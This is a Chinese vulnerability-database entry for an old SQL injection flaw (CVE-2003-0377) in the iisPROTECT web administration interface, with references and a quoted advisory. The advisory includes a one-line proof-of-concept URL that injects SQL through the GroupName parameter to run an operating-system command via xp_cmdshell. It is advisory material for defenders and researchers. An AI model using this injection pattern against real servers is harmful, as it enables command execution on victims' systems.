iisPROTECT SQL注入漏洞

iisPROTECT SQL注入漏洞

漏洞ID 1107345 漏洞类型 SQL注入
发布时间 2003-05-23 更新时间 2003-06-16
图片[1]-iisPROTECT SQL注入漏洞-安全小百科CVE编号 CVE-2003-0377
图片[2]-iisPROTECT SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200306-057
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22639
https://www.securityfocus.com/bid/82782
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-057
|漏洞详情
iisPROTECT2.2-r4版本及可能更早版本中基于Web的管理界面存在SQL注入漏洞。远程攻击者借助特定变量插入任意SQL并执行代码,正如SiteAdmin.ASP中使用的GroupName变量。
|漏洞EXP
source: http://www.securityfocus.com/bid/7675/info

The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect.

Successful exploitation could result in a compromise of the IISProtect server, attacks on the database or other consequences. 

http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste
r..xp_cmdshell'ping%2010.10.10.11';--

This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.
|受影响的产品
iisProtect iisProtect 2.2 R4
|参考资料

来源:BUGTRAQ
名称:20030523iisPROTECTSQLinjectioninadmininterface
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105370528728225&w;=2

相关推荐: NT RAS Dial-up Networking “Save Password” Vulnerability

NT RAS Dial-up Networking “Save Password” Vulnerability 漏洞ID 1104960 漏洞类型 Design Error 发布时间 1998-03-19 更新时间 1998-03-19 CVE编号 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享